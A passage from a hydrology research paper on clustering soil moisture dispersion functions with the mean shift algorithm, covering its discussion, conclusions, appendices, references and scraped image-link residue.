well).\n\nWe conclude that cluster transitions were often triggered by rainfall events. Not all of the strongest rainfall events caused a cluster transition and not every cluster transition could be related to a rainfall sum or frequency within the window of the transition. The characteristics provided in Sect. B provide a good starting point, but further investigations of the rainfall events, their spatial characteristics and relation to the moisture state are needed.\n\n## 4.4 Mean shift as a diagnostic tool\n\nWe used mean shift mainly as a diagnostic tool to cluster dispersion functions based on their similarity. Similarity is measured by the Euclidean distance between two dispersion function vectors. This Euclidean distance does, however, not provide information on the underlying cause of dissimilarity, and thus a minor difference in the values of the dispersion functions, even though characterized by a very similar shape, could result in the same level of dissimilarity as a change in the shape of the dispersion function. We observed some cluster separations that were caused by minor differences in mean dispersion, while essentially describing the same spatial dependency.\n\nIt is possible to train better mean shift algorithm instances. As described in the methods, we selected the bandwidth parameter for mean shift to yield meaningful results for the entire data set. The same parameter was used for all subsets to cluster dispersion functions on the same basis. This makes the clustering procedure itself comparable and, thus, the number of identified clusters can support result interpretation. Nevertheless, it is likely that better bandwidth parameters can be found for each data subset individually and overcome misclassifications as described above. Our objective, however, was to find clustering results that can directly be compared to each other (instead of comparing hyper-parameters).\n\nDispersion functions operate in a higher-dimensional space and might be affected by the curse of dimensionality. Mean shift clusters data points based on their distance to each other. Following the theory of the curse of dimensionality, with each added dimension (of these points), the difference of maximum and minimum distance between points becomes less significant . On the one hand, we wish to resolve dispersion functions on as many distance lag classes as possible to gain more insight into spatial dependencies. On the other hand, each additional lag class possibly decreases the performance of mean shift (or any other clustering algorithm) and makes the results less meaningful. We calculated dispersion functions using a 30-day aggregation window and therefore end up with 335 points for mean shift. However, despite the limited number of points and the resulting uncertainty of cluster identification, the clusters identified here seem plausible.\n\nMean shift is sensitive for the bandwidth parameter. As described in the methods (Sect. 2.3), the bandwidth parameter has to be specified and has direct influence on the amount of clusters formed by the algorithm. We found a suitable parameter through trial-and-error. It would be more satisfactory to infer this crucial parameter from the data or supplementary information gathered at field campaigns. However, to our knowledge there is no such method or procedure to infer bandwidth parameters for mean shift from a data sample.\n\n## 4.5 Limitations of the proposed method\n\nSuccessful clustering does not point out spatial dependency. Mean shift can cluster functions without spatial dependency, as it uses their distance and no actual covariance between the functions. In this case the clustering is based on differences in the mean, which may not even be statistically significant. The mean shift algorithm is not meant to test clusters for statistical independence. Whether two groups of points are separated or not depends only on the bandwidth parameter. Therefore the centroid functions of each cluster have to be checked for their shape and the information on spatial dependency that follows from that shape.\n\nOur approach to find suitable bins to calculate the Shannon entropy is sensitive to outliers. We decided to rather define the width of a bin instead of their number. The reasons and necessity to do so were discussed in detail in Sect. 4.2. As a width we used the uncertainty propagated into dispersion function distances. From all distances within uncertainty margins, we used the maximum value. In cases where this maximum distance is an outlier, it will influence the whole entropy calculation. This is a limitation to our method but an acceptable one, as it is still superior to other approaches from our point of view. Choosing the maximum distance within each year or depth (or both) will yield more bins for entropy calculations and therefore a wider range of values, but it would be very hard to compare these values.\n\nFrom the point of view of the monitoring network, it has to be mentioned that the analysis of the 2013 data is likely to be less reliable, as during this period of installation the number of sensors was still lower than in the following years.\n\nDue to the sampling design and the amount of observation points, we did not systematically test for differences of forest vs. pasture plots, but ran our analyses across the two land covers. The fundamentally different shapes of cluster centroids in the summer clusters and, thus, the strong effect of vegetation-altering soil moisture patterns might be partly more pronounced due to the sampling design and not easy transferable to other sites. In our opinion, we would have made the same observations with a more stratified sampling design, as this is systematic catchment behavior, but we can neither confirm nor reject this.\n\n5 Conclusions\n\nWe presented a new method to identify periods of similar spatial dispersion present in a data set. While soil moisture observations might be spatially heterogeneous, spatial patterns are much more persistent in time. We found two fundamentally different states: on the one hand, rainfall-driven cluster formations, usually characterized by strong relationships between dispersion and separating distance and a characteristic length roughly matching the hillslope scale. On the other hand, we found clusters forming during the vegetation period. A drying and then dry soil exhibits dispersion functions which are much flatter, indicating homogeneity across space. Interestingly, these functions flatten out by minimizing the dispersion on large distance lags, which implies that dissimilarities do not increase with separating distance. We can thus see how the soil acts as a low-pass filter.\n\nWhile these long-lasting periods of similar spatial patterns help us to understand how and when the soil is wetting or dying in an organized manner, there are possible applications beyond this. One could use the identification of clusters to stratify data based on spatial dispersion for combined modeling. Then, for example, a set of spatio-temporal geostatistical models or hydrological models applied to each period separately might in combination return reasonable catchment responses.\n\nOur most interesting finding is that even a few soil moisture time series bear a considerable amount of predictive information about dynamic changes in soil moisture. We argue that distributed soil moisture reflects an organized catchment state, where soil moisture variability is not random and only a small amount of observation points is necessary to capture soil moisture dynamics.\n\nAppendix A: Mean shift algorithm\n\nMean shift starts by forming a cluster for each sample on its own. Here, a sample corresponds to one dispersion function. We will illustrate the fundamental mechanism of the algorithm for the two-dimensional case, as the samples can easily be plotted in 2 (see Fig. A1a and b). Mean shift works iteratively. In each iteration, a window is shifted over all samples, which can be thought of as coordinate points in the two-dimensional case (see Fig. A1a). This window is called a kernel that is controlled by a size parameter called bandwidth, which is the Euclidean distance between two samples. In the two-dimensional case, this can be thought of as a circle with a radius set to the given bandwidth as shown in Fig. A1a. In each kernel position, the center of sample density is calculated and the current sample is shifted onto this point, which is the new cluster mean, called the cluster centroid. In the next iteration, the newly created cluster centroids are used as the new (input) samples, as shown in Fig. A1b. Hence, with the bandwidth, we define a maximum Euclidean distance at which two samples are still considered to belong to the same group. The iterations stop when the shifting means converge (centroids do not change their position anymore). We substitute the centroids calculated on the last iteration by the original sample closest to this point. Thus, we choose the most representative dispersion function for the cluster.",
null,
"Figure A1Schematic procedure of the mean shift algorithm in 2. (a) Red dots indicate hypothetical samples to be clustered. The circles illustrate the flat kernel of the centered sample at first iteration. The bandwidth parameter is illustrated by the radius. The red arrows indicate the shift of the respective sample onto the geometric mean of all samples inside the current kernel. Note that three points on the left-hand side are shifted differently, as the upper and lower points do not lie in each other's kernel. (b) Second iteration step after (a). The blue dots are the shifted means from (a) and will be used as the input sample for the next iteration. The procedure finishes when no points can be “shifted” anymore. (c) Example of a large bandwidth (radius), which will result in only one cluster at convergence. (d) Example of a too small bandwidth, where no point will be shifted at all.\n\nMean shift is sensitive to the selected bandwidth. Two clusters whose centroids are within one bandwidth length will be shifted into a combined cluster before convergence is met. As a result a bandwidth parameter chosen too big might classify all samples as a single cluster as indicated in Fig. A1c. In case the bandwidth is chosen too small, many tiny clusters with just a few members will be the result. Figure A1d shows an extreme example, where no sample will shift anywhere. We tested different bandwidth parameters at a few examples and set the bandwidth to the 30 % percentile of all pairwise Euclidean vector distances between the dispersion functions of 1 year and depth. We chose the so-called flat kernel as a kernel, which would result in a circle in the two-dimensional case and a N-dimensional sphere in N, where N is the number of lag classes used for the dispersion function.\n\nAppendix B: Auxiliary quantitative results\n\nTable B1Quantitative results summary. For each depth and cluster of 2016 different cluster characteristics were calculated. The duration of each cluster is given in the third column. To compare rainfall forcing with the emergence of clusters, the rainfall characteristics were based on the same moving window as the clusters. The mean rainfall frequency f30 within each window is given in the fourth column. The mean 30 d sum over the whole cluster ${\\sum }_{i=\\mathrm{0}}^{\\mathrm{30}}R$ in the fifth column. To assess the variability of dispersion functions within each cluster, different measures are given. γ is the dispersion, as calculated in Eq. (2). This describes the dispersion of dispersion functions within one cluster. H is the entropy of the distribution of all cluster members within each cluster. Both measures are calculated for the distribution of each distance lag class individually.",
null,
"",
null,
"Figure B1Mean rolling rainfall sum (a) and rainfall frequency (b) for 2016. The colored boxes indicate the current cluster as shown in Fig. 3d. Both values were calculated for the same windows as the dispersion functions by using Eq. (1) for the daily rainfall sums, with the total rainfall sum in the window in (a) and the number of days of rainfall occurring in (b).\n\nAppendix C: Detailed result plots of 30 cm in 2014 and 2015",
null,
"Figure C1Spatial dispersion functions in 30 cm for 2014 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the higher in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2014 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.",
null,
"Figure C2Spatial dispersion functions in 30 cm for 2015 based on a window size of 30 d. (a) Spatial dispersion function for each position of the moving window. The red color saturation indicates the window position. The darker the red, the later in the year. (b) The same dispersion functions as presented in (a). Here the color indicates cluster membership as identified by the mean shift algorithm. (c) Compressed spatial dispersion information represented by corrected cluster centroids. The colors match the clusters as presented in (b). (d) Soil moisture time series of 2015 in 30 cm depth. The colors identify the cluster membership of the spatial dispersion function of the current window location and match the colors in (b) and (c). The bars on the top show the daily precipitation sums. The solid blue line is the cumulative daily precipitation sum and the red line the cumulative sum of all mean daily temperatures > 5 C. The green bar marks the assumed vegetation period. It covers the dates where the cumulative day-degree sum is >15 % and <90 % of the maximum.\n\nCode and data availability\n\nMajor parts of the analysis are based on the scipy , scikit-learn and scikit-gstat package . All plots were generated using the matplotlib package (Hunter2007). The full analyses of Python scripts are published on Github (https://github.com/mmaelicke/soil-moisture-dynamics-companion-code, last access: 28 April 2020) (Mälicke2019). The data are available upon request.\n\nAuthor contributions\n\nThe methodology was developed by MM, supervised by EZ and discussed with SKH. The data were provided by TB and MW. All the code was developed by MM. The manuscript was written by MM, with contributions by EZ in the introduction, discussion and formulas. SKH supplied the field and data descriptions. The structure, narrative and language of the manuscript were revised and significantly improved by TB.\n\nCompeting interests\n\nThe authors declare that they have no conflict of interest.\n\nAcknowledgements\n\nWe thank the German Ministerium für Wissenschaft, Forschung und Kunst, Baden-Württemberg, for funding the V-FOR-WaTer project. We thank the German Research Foundation (DFG) for funding of CAOS research unit FOR 1598. We especially thank Britta Kattenstroth and Tobias Vetter, the technicians in charge of the maintenance of the monitoring network. The authors also acknowledge support by the Deutsche Forschungsgemeinschaft and the Open Access Publishing Fund of the Karlsruhe Institute of Technology (KIT).\n\nFinancial support\n\nThe article processing charges for this open-access publication were covered by a Research Centre of the Helmholtz Association.\n\nReview statement\n\nThis paper was edited by Alberto Guadagnini and reviewed by two anonymous referees.\n\nReferences\n\nAlbertson, J. D. and Montaldo, N.: Temporal dynamics of soil moisture variability: 1. Theoretical basis, Water Resour. Res., 39, 1274, https://doi.org/10.1029/2002WR001616, 2003. a\n\nBárdossy, A. and Kundzewicz, Z. W.: Geostatistical methods for detection of outliers in groundwater quality spatial fields, J. Hydrol., 115, 343–359, https://doi.org/10.1016/0022-1694(90)90213-H, 1990. a\n\nBárdossy, A. and Lehmann, W.: Spatial distribution of soil moisture in a small catchment. Part 1: Geostatistical analysis, J. Hydrol., 206, 1–15, https://doi.org/10.1016/S0022-1694(97)00152-2, 1998. a\n\nBarlow, R. E., Bartholomew, D., Bremner, J., and Brunk, H.: Statistical Inference Under Order Restrictions: Theory and Application of Isotonic Regression, Tech. rep., Dept. of Statistics, Missouri Univ., Comumbia, 1972. a\n\nBeyer, K., Goldstein, J., Ramakrishnan, R., and Shaft, U.: When Is “Nearest Neighbor” Meaningful?, in: International conference on database theory, Springer, Berlin, Heidelberg, 217–235, https://doi.org/10.1007/3-540-49257-7_15, 1999. a\n\nBlume, T., Zehe, E., and Bronstert, A.: Use of soil moisture dynamics and patterns at different spatio-temporal scales for the investigation of subsurface flow processes, Hydrol. Earth Syst. Sci., 13, 1215–1233, https://doi.org/10.5194/hess-13-1215-2009, 2009. a, b\n\nBras, R. L.: Complexity and organization in hydrology: A personal view, Water Resour. Res., 51, 6532–6548, https://doi.org/10.1002/2015WR016958, 2015. a\n\nBrocca, L., Morbidelli, R., Melone, F., and Moramarco, T.: Soil moisture spatial variability in experimental areas of central Italy, J. Hydrol., 333, 356–373, https://doi.org/10.1016/j.jhydrol.2006.09.004, 2007. a, b\n\nBrocca, L., Melone, F., Moramarco, T., and Morbidelli, R.: Soil moisture temporal stability over experimental areas in Central Italy, Geoderma, 148, 364–374, https://doi.org/10.1016/j.geoderma.2008.11.004, 2009. a\n\nBrocca, L., Tullo, T., Melone, F., Moramarco, T., and Morbidelli, R.: Catchment scale soil moisture spatial-temporal variability, J. Hydrol., 422–423, 63–75, https://doi.org/10.1016/j.jhydrol.2011.12.039, 2012. a\n\nBronstert, A., Creutzfeldt, B., Graeff, T., Hajnsek, I., Heistermann, M., Itzerott, S., Jagdhuber, T., Kneis, D., Lück, E., Reusser, D., and Zehe, E.: Potentials and constraints of different types of soil moisture observations for flood simulations in headwater catchments, Nat. Hazards, 60, 879–914, https://doi.org/10.1007/s11069-011-9874-9, 2012. a\n\nBurgess, T. M. and Webster, R.: Optimal interpolation and isarithmic mapping of soil properties. I. The semi-variogram and punctual kriging, J. Soil Sci., 31, 315–331, https://doi.org/10.1111/j.1365-2389.1980.tb02084.x, 1980. a, b\n\nChoi, W. and Jacobs, R. L.: Influences of formal learning, personal learning orientation, and supportive learning environment on informal learning, Human Resour. Dev. Quart., 22, 239–257, 2011. a\n\nComaniciu, D. and Meer, P.: Mean shift: A robust approach toward feature space analysis, IEEE T. Pattern Anal. Mach. Intel., 24, 603–619, 2002. a\n\nCressie, N. and Hawkins, D. M.: Robust estimation of the variogram: I, J. Int. Asso. Math. Geol., 12, 115–125, https://doi.org/10.1007/BF01035243, 1980. a, b\n\nDaly, E. and Porporato, A.: A review of soil moisture dynamics: from rainfall infiltration to ecosystem response, Environ. Eng. Sci., 22, 9–24, 2005. a\n\nDe Cesare, L., Myers, D., and Posa, D.: FORTRAN programs for space-time modeling, Comput. Geosci., 28, 205–212, 2002. a\n\nDooge, J. C.: Looking for hydrologic laws, Water Resour. Res., 22, 46S–58S, https://doi.org/10.1029/WR022i09Sp0046S, 1986. a\n\nEntekhabi, D., Rodriguez-Iturbe, I., and Bras, R. L.: Variability in large-scale water balance with land surface–atmosphere interaction, J. Climate, 5, 798–813, 1992. a\n\nFukunaga, K. and Hostetler, L.: The estimation of the gradient of a density function, with applications in pattern recognition, IEEE T. Inform. Theor., 21, 32–40, 1975. a\n\nGómez-Plaza, A., Martínez-Mena, M., Albaladejo, J., and Castillo, V.: Factors regulating spatial distribution of soil water content in small semiarid catchments, J. Hydrol., 253, 211–226, 2001. a\n\nGrayson, R. B., Western, A. W., Chiew, F. H. S., and Blöschl, G.: Preferred states in spatial soil moisture patterns: Local and nonlocal controls, Water Resour. Res., 33, 2897–2908, https://doi.org/10.1029/97WR02174, 1997. a, b, c\n\nHeathman, G. C., Larose, M., Cosh, M. H., and Bindlish, R.: Surface and profile soil moisture spatio-temporal analysis during an excessive rainfall period in the Southern Great Plains, USA, Catena, 78, 159–169, 2009. a\n\nHinterding, A.: Entwicklung hybrider Interpolationsverfahren für den automatisierten Betrieb am Beispiel meteorologischer Größen, PhD thesis, Institut für Geoinformatik, Universität Münster, Münster, Germany, 2003. a\n\nHunter, J. D.: Matplotlib: A 2D graphics environment, Comput. Sci. Eng., 9, 90–95, https://doi.org/10.1109/MCSE.2007.55, 2007. a\n\nIUSS Working Group WRB: World Reference Base for Soil Resources 2006, in: A Framework for International Classification, Correlation and Communication, World Soil Resour. Rep., Food and Agric. Organ. of the UN, Rome, available at: http://www.fao.org/3/a-a0510e.pdf (last access: 20 May 2020), 2006. a\n\nJost, G., Heuvelink, G., and Papritz, A.: Analysing the space–time distribution of soil water storage of a forest ecosystem using spatio-temporal kriging, Geoderma, 128, 258–273, 2005. a\n\nKitanidis, P. K. and Vomvoris, E. G.: A geostatistical approach to the inverse problem in groundwater modeling (steady state) and one-dimensional simulations, Water Resour. Res., 19, 677–690, https://doi.org/10.1029/WR019i003p00677, 1983. a\n\nKleidon, A.: How does the Earth system generate and maintain thermodynamic disequilibrium and what does it imply for the future of the planet?, Philos. T. Roy. Soc. A, 370, 1012–1040, 2012. a\n\nKondepudi, D. and Prigogine, I.: From heat engines to dissipative structures, in: Modern Thermodynamics, John Wiley & Sons, Chichester, 1998. a\n\nKullback, S. and Leibler, R. A.: On information and sufficiency, Ann. Math. Stat., 22, 79–86, 1951. a\n\nLark, R. M.: Towards soil geostatistics, Spatial Stat., 1, 92–99, https://doi.org/10.1016/j.spasta.2012.02.001, 2012. a, b\n\nLoritz, R., Hassler, S. K., Jackisch, C., Allroggen, N., van Schaik, L., Wienhöfer, J., and Zehe, E.: Picturing and modeling catchments by representative hillslopes, Hydrol. Earth Syst. Sci., 21, 1225–1249, https://doi.org/10.5194/hess-21-1225-2017, 2017. a, b\n\nLoritz, R., Gupta, H., Jackisch, C., Westhoff, M., Kleidon, A., Ehret, U., and Zehe, E.: On the dynamic nature of hydrological similarity, Hydrol. Earth Syst. Sci., 22, 3663–3684, https://doi.org/10.5194/hess-22-3663-2018, 2018. a, b, c, d, e\n\nLy, S., Charles, C., and Degré, A.: Geostatistical interpolation of daily rainfall at catchment scale: The use of several variogram models in the Ourthe and Ambleve catchments, Belgium, Hydrol. Earth Syst. Sci., 15, 2259–2274, https://doi.org/10.5194/hess-15-2259-2011, 2011. a\n\nMa, C.: Spatio-temporal covariance functions generated by mixtures, Math. Geol., 34, 965–975, 2002. a\n\nMa, C.: Spatio-temporal stationary covariance models, J. Multivar. Anal., 86, 97–107, 2003. a\n\nMälicke, M.: Companion Code for: Soil moisture: variable in space but redundant in time. (10.5194/hess-2019-574), Zenodo, https://doi.org/10.5281/zenodo.3773110, 2019. a\n\nMälicke, M. and Schneider, H. D.: Scikit-GStat 0.2.7: A scipy flavoured geostatistical analysis toolbox written in Python, Zenodo, https://doi.org/10.5281/zenodo.3552235, 2019. a\n\nMartinez-Carreras, N., Krein, A., Gallart, F., Iffly, J.-F., Hissler, C., Pfister, L., Hoffmann, L., and Owens, P. N.: The influence of sediment sources and hydrologic events on the nutrient and metal content of fine-grained sediments (attert river basin, Luxembourg), Water Air Soil Poll., 223, 5685–5705, 2012. a\n\nMartínez-Fernández, J. and Ceballos, A.: Temporal stability of soil moisture in a large-field experiment in Spain, Soil Sci. Soc. Am. J., 67, 1647–1656, 2003. a\n\nMcDonnell, J. J., Roderick, M. L., Selker, J., Vaché, K., Hinz, C., Hooper, R., Grant, G., Sivapalan, M., Kirchner, J., Weiler, M., Dunn, S., and Haggerty, R.: Moving beyond heterogeneity and process complexity: A new vision for watershed hydrology, Water Resour. Res., 43, W07301, https://doi.org/10.1029/2006wr005467, 2007. a\n\nMcNamara, J. P., Chandler, D., Seyfried, M., and Achet, S.: Soil moisture states, lateral flow, and streamflow generation in a snowmelt-driven catchment, Hydrol. Process., 19, 4023–4038, 2005. a\n\nMeyles, E., Williams, A., Ternan, L., and Dowd, J.: Runoff generation in relation to soil moisture patterns in a small Dartmoor catchment, Southwest England, Hydrol. Process., 17, 251–264, https://doi.org/10.1002/hyp.1122, 2003. a, b\n\nMittelbach, H. and Seneviratne, S. I.: A new perspective on the spatio-temporal variability of soil moisture: temporal dynamics versus time-invariant contributions, Hydrol. Earth Syst. Sci., 16, 2169–2179, https://doi.org/10.5194/hess-16-2169-2012, 2012. a, b, c\n\nPachepsky, Y. A., Guber, A., and Jacques, D.: Temporal persistence in vertical distributions of soil moisture contents, Soil Sci. Soc. Am. J., 69, 347–352, 2005. a\n\nPatil, S. and Stieglitz, M.: Controls on hydrologic similarity: Role of nearby gauged catchments for prediction at an ungauged catchment, Hydrol. Earth Syst. Sci., 16, 551–562, https://doi.org/10.5194/hess-16-551-2012, 2012. a\n\nPedregosa, F., Varoquaux, G., Gramfort, A., Michel, V., Thirion, B., Grisel, O., Blondel, M., Prettenhofer, P., Weiss, R., Dubourg, V., Vanderplas, J., Passos, A., Cournapeau, D., Brucher, M., Perrot, M., and Duchesnay, E.: Scikit-learn: Machine Learning in Python, J. Mach. Learn. Res., 12, 2825–2830, 2011. a, b, c\n\nPfister, L., Humbert, J., and Hoffmann, L.: Recent trends in rainfall-runoff characteristics in the Alzette river basin, Luxembourg, Climatic Change, 45, 323–337, 2000. a\n\nPool, M., Carrera, J., Alcolea, A., and Bocanegra, E. M.: A comparison of deterministic and stochastic approaches for regional scale inverse modeling on the Mar del Plata aquifer, J. Hydrol., 531, 214–229, https://doi.org/10.1016/j.jhydrol.2015.09.064, 2015. a\n\nRodríguez‐Iturbe, I., Devoto, G., and Valdés, J. B.: Discharge response analysis and hydrologic similarity: The interrelation between the geomorphologic IUH and the storm characteristics, Water Resour. Res., 15, 1435–1444, https://doi.org/10.1029/WR015i006p01435, 1979. a\n\nRolston, D. E., Biggar, J. W., and Nightingale, H. I.: Temporal persistence of spatial soil-water patterns under trickle irrigation, Irrig. Sci., 12, 181–186, https://doi.org/10.1007/BF00190521, 1991. a\n\nRosenbaum, U., Bogena, H. R., Herbst, M., Huisman, J. A., Peterson, T. J., Weuthen, A., Western, A. W., and Vereecken, H.: Seasonal and event dynamics of spatial soil moisture patterns at the small catchment scale, Water Resour. Res., 48, W10544, https://doi.org/10.1029/2011WR011518, 2012. a\n\nSampson, P. D. and Guttorp, P.: Nonparametric Estimation of Nonstationary Spatial Covariance Structure, J. Am. Stat. Assoc., 87, 108–119, https://doi.org/10.1080/01621459.1992.10475181, 1992. a\n\nSchume, H., Jost, G., and Katzensteiner, K.: Spatio-temporal analysis of the soil water content in a mixed Norway spruce (Picea abies (L.) Karst.) – European beech (Fagus sylvatica L.) stand, Geoderma, 112, 273–287, https://doi.org/10.1016/S0016-7061(02)00311-7, 2003. a\n\nShannon, C. E.: A mathematical theory of communication, Bell Syst. Tech. J., 27, 379–423, 1948. a, b\n\nSivapalan, M.: Process complexity at hillslope scale, process simplicity at the watershed scale: is there a connection?, Hydrol. Process., 17, 1037–1041, https://doi.org/10.1002/hyp.5109, 2003. a\n\nSivapalan, M., Yaeger, M. A., Harman, C. J., Xu, X., and Troch, P. A.: Functional model of water balance variability at the catchment scale: 1. Evidence of hydrologic similarity and space-time symmetry, Water Resour. Res., 47, W02522, https://doi.org/10.1029/2010WR009568, 2011. a\n\nSnepvangers, J., Heuvelink, G., and Huisman, J.: Soil water content interpolation using spatio-temporal kriging with external drift, Geoderma, 112, 253–271, 2003. a\n\nSprenger, M., Seeger, S., Blume, T., and Weiler, M.: Travel times in the vadose zone: Variability in space and time, Water Resour. Res., 52, 5727–5754, 2016. a\n\nStarr, J. L. and Timlin, D. J.: Using High‐Resolution Soil Moisture Data to Assess Soil Water Dynamics in the Vadose Zone, Vadose Zone J., 3, 926–935, https://doi.org/10.2136/vzj2004.0926, 2004. a\n\nTakagi, K. and Lin, H. S.: Changing controls of soil moisture spatial organization in the Shale Hills Catchment, Geoderma, 173-174, 289–302, https://doi.org/10.1016/j.geoderma.2011.11.003, 2012. a\n\nTeuling, A. J. and Troch, P. A.: Improved understanding of soil moisture variability dynamics, Geophys. Res. Lett., 32, L05404, https://doi.org/10.1029/2004GL021935, 2005. a\n\nTeuling, A. J., Uijlenhoet, R., Hupet, F., van Loon, E. E., and Troch, P. A.: Estimating spatial mean root-zone soil moisture from point-scale observations, Hydrol. Earth Syst. Sci., 10, 755–767, https://doi.org/10.5194/hess-10-755-2006, 2006. a, b, c, d\n\nTopp, G., Davis, J., and Annan, A.: Electromagnetic Determination of Soil Water Content Using TDR: I. Applications to Wetting Fronts and Steep Gradients 1, Soil Sci. Soc. Am. J., 46, 672–678, 1982. a\n\nTopp, G., Zebchuk, W., Davis, J., and Bailey, W.: The measurement of soil water content using a portable TDR hand probe, Can. J. Soil Sc., 64, 313–321, 1984. a\n\nVanderlinden, K., Vereecken, H., Hardelauf, H., Herbst, M., Martínez, G., Cosh, M. H., and Pachepsky, Y. A.: Temporal Stability of Soil Water Contents: A Review of Data and Analyses, Vadose Zone J., 11, vzj2011.0178, https://doi.org/10.2136/vzj2011.0178, 2012. a, b, c, d, e\n\nVereecken, H., Huisman, J. A., Bogena, H., Vanderborght, J., Vrugt, J. A., and Hopmans, J. W.: On the value of soil moisture measurements in vadose zone hydrology: A review, Water Resour. Res., 44, W00D06, https://doi.org/10.1029/2008WR006829, 2008. a, b\n\nVirtanen, P., Gommers, R., Oliphant, T. E., Haberland, M., Reddy, T., Cournapeau, D., Burovski, E., Peterson, P., Weckesser, W., Bright, J., van der Walt, S. J., Brett, M., Wilson, J., Millman, K. J., Mayorov, N., Nelson, A. R. J., Jones, E., Kern, R., Larson, E., Carey, C. J., Polat, İ., Feng, Y., Moore, E. W., VanderPlas, J., Laxalde, D., Perktold, J., Cimrman, R., Henriksen, I., Quintero, E. A., Harris, C. R., Archibald, A. M., Ribeiro, A. H., Pedregosa, F., van Mulbregt, P., and SciPy 1.0 Contributors: SciPy 1.0: Fundamental Algorithms for Scientific Computing in Python, Nature Methods, in press, 2020. a\n\nWagener, T., Sivapalan, M., Troch, P., and Woods, R.: Catchment Classification and Hydrologic Similarity, Geogr. Compass, 1, 901–931, https://doi.org/10.1111/j.1749-8198.2007.00039.x, 2007. a\n\nWeijs, S. V., Van De Giesen, N., and Parlange, M. B.: Data compression to define information content of hydrological time series, Hydrol. Earth Syst. Sci., 17, 3171–3187, https://doi.org/10.5194/hess-17-3171-2013, 2013. a\n\nWendi, D. and Marwan, N.: Extended recurrence plot and quantification for noisy continuous dynamical systems, Chaos, 28, 085722, https://doi.org/10.1063/1.5025485, 2018. a\n\nWendi, D., Marwan, N., and Merz, B.: In Search of Determinism-Sensitive Region to Avoid Artefacts in Recurrence Plots, Int. J. Bifurcat. Chaos, 28, 1850007, https://doi.org/10.1142/s0218127418500074, 2018. a\n\nWestern, A. W. and Grayson, R. B.: The Tarrawarra data set: Soil moisture patterns, soil characteristics, and hydrological flux measurements, Water Resour. Res., 34, 2765–2768, 1998. a, b\n\nWestern, A. W., Grayson, R. B., Blöschl, G., Willgoose, G. R., and McMahon, T. A.: Observed spatial organization of soil moisture and its relation to terrain indices, Water Resour. Res., 35, 797–810, https://doi.org/10.1029/1998WR900065, 1999. a, b\n\nWestern, A. W., Zhou, S. L., Grayson, R. B., McMahon, T. A., Blöschl, G., and Wilson, D. J.: Spatial correlation of soil moisture in small catchments and its relationship to dominant spatial hydrological processes, J. Hydrol., 286, 113–134, https://doi.org/10.1016/j.jhydrol.2003.09.014, 2004. a, b\n\nWu, W., Geller, M. A., and Dickinson, R. E.: The response of soil moisture to long-term variability of precipitation, J. Hydrometeorol., 3, 604–613, 2002. a\n\nZehe, E., Graeff, T., Morgner, M., Bauer, A., and Bronstert, A.: Plot and field scale soil moisture dynamics and subsurface wetness control on runoff generation in a headwater in the Ore Mountains, Hydrol. Earth Syst. Sci., 14, 873–889, https://doi.org/10.5194/hess-14-873-2010, 2010. a, b, c\n\nZehe, E., Ehret, U., Pfister, L., Blume, T., Schröder, B., Westhoff, M., Jackisch, C., Schymanski, S. J., Weiler, M., Schulz, K., Allroggen, N., Tronicke, J., van Schaik, L., Dietrich, P., Scherer, U., Eccard, J., Wulfmeyer, V., and Kleidon, A.: HESS Opinions: From response units to functional units: a thermodynamic reinterpretation of the HRU concept to link spatial organization and functioning of intermediate scale catchments, Hydrol. Earth Syst. Sci., 18, 4635–4655, https://doi.org/10.5194/hess-18-4635-2014, 2014. a, b, c, d\n\nWe tested different window sizes, as we expect that different processes control the emergence of spatial dependence at different temporal scales. The chosen window size was most suitable for detecting seasonal effects.\n\nObservation point pairs further apart than 1200 m are most likely located on different hillslopes. These points might share similar soil, topographic and terrain aspect characteristics. Soil moisture dynamics might thus be similar, although they are located at rather large separating distances"
] | [
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-avatar-thumb150.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f01-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f02-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f03-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f04-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-t01-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f05-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-t02-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f06-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-t03-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f07-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f08-thumb.png",
null,
"https://hess.copernicus.org/articles/24/2633/2020/hess-24-2633-2020-f09-thumb.png",
null
